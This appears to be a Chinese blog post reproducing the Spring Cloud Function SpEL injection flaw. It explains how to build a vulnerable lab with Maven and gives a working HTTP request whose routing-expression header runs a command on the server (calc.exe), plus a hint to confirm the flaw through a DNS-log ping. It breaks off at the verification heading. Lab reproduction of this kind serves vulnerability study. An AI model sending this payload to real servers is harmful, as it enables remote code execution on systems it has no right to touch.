Spring-Cloud-Function-Spel 漏洞复现

Spring-Cloud-Function-Spel 漏洞复现

1、漏洞环境搭建

　　由于漏洞出现在前两天，原本等待vulhub出环境，直接docker 一键就ok了。但是这次vulhub好像不太及时。对于自己只能自己搭建环境了。

       找了许久，终于在唐大佬的github中找到几乎一键的方法。

　　参考链接：https://github.com/tangxiaofeng7/Spring-Cloud-Function-Spel  这里放原始链接以表示尊重。

　　无法上github的话，私信我。

　　搭建方法很简单，先安装maven  jdk 等。大佬是jdk17  我本地下载最新版本18 也是ok

　　

 

     方法如下：下载代码后，在解压目录cmd执行 mvn spring-boot:run  会下载很多库，需要耐心等待。成功后会开启8080 端口。

　 

 

 

   漏洞poc极其简单：

　　路径最好使用funtionRouter，原因自查。此环境倒是任意路径都ok。

　　

POST /functionRouter HTTP/1.1
Host: 192.168.1.7:8080
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("calc.exe")
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
  可以执行任意命令，检测的话可以使用dnslog方法。直接ping  dnslog平台。

 

　　漏洞验证：